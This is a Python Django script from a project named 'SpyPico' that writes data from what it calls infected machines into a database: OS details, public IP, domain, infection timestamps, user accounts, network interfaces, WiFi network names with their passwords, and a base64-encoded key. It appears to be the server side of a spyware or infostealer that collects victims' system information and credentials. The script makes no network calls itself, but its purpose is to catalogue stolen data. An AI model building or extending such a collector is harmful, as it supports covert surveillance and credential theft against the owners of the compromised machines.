import os
import django
import sys

os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SpyPico.settings')
django.setup()

from backend.models import Maquina, Usuario, Red, Wifi, Password

def insert_into_db(datos):
    datos_maquina = datos.get("Maquina", {})

    if datos_maquina.get("OS Name"):  # Claves en inglés
        insert_Maquina = Maquina.objects.create(
            nombre=datos_maquina.get("whoami"),  # Cambiar por identificador real si lo tienes
            sistema_operativo=datos_maquina.get("OS Name"),
            version_sistema=datos_maquina.get("OS Version"),
            fabricante=datos_maquina.get("System Manufacturer"),
            modelo=datos_maquina.get("System Model"),
            ip_publica=datos.get("IP_Publica"),
            dominio=datos_maquina.get("Domain"),
            tiempo_de_infeccion_fecha=datos_maquina.get("Fecha_Infeccion", None),
            tiempo_de_infeccion_hora=datos_maquina.get("Hora_Infeccion", None),
        )
    elif datos_maquina.get("Nombre del sistema operativo"):  # Claves en español
        insert_Maquina = Maquina.objects.create(
            nombre=datos_maquina.get("whoami"),  # Cambiar por identificador real si lo tienes
            sistema_operativo=datos_maquina.get("Nombre del sistema operativo"),
            version_sistema=datos_maquina.get("Versión del sistema operativo"),
            fabricante=datos_maquina.get("Fabricante del sistema"),
            modelo=datos_maquina.get("Modelo del sistema", None),
            ip_publica=datos.get("IP_Publica"),
            dominio=datos_maquina.get("Dominio"),
            tiempo_de_infeccion_fecha=datos_maquina.get("Fecha de infección", None),
            tiempo_de_infeccion_hora=datos_maquina.get("Hora de infección", None),
        )

    # Insertar usuarios
    datos_usuario = datos.get("Usuarios", {})
    for i in datos_usuario:
        insert_usuarios = Usuario.objects.create(
        maquina = insert_Maquina,
        nombre = i,
        estado = datos_usuario[i]
     )


    # Insertar redes
    datos_red = datos.get("Redes")
    for i in datos_red:
        insert_red = Red.objects.create(
        maquina = insert_Maquina,
        interfaz = i.get('Interfaz'),
        ip = i.get('IP')
    )

    # Insertar redes WiFi
    for wifi in datos.get("Redes_WiFi", []):
        Wifi.objects.create(
            maquina=insert_Maquina,
            ssid=wifi.get('SSID'),
            clave=wifi.get('Clave')
        )

    # Insertar clave cifrada
    Password.objects.create(
        maquina=insert_Maquina,
        clave_base64=datos.get("Clave_Base64")
    )
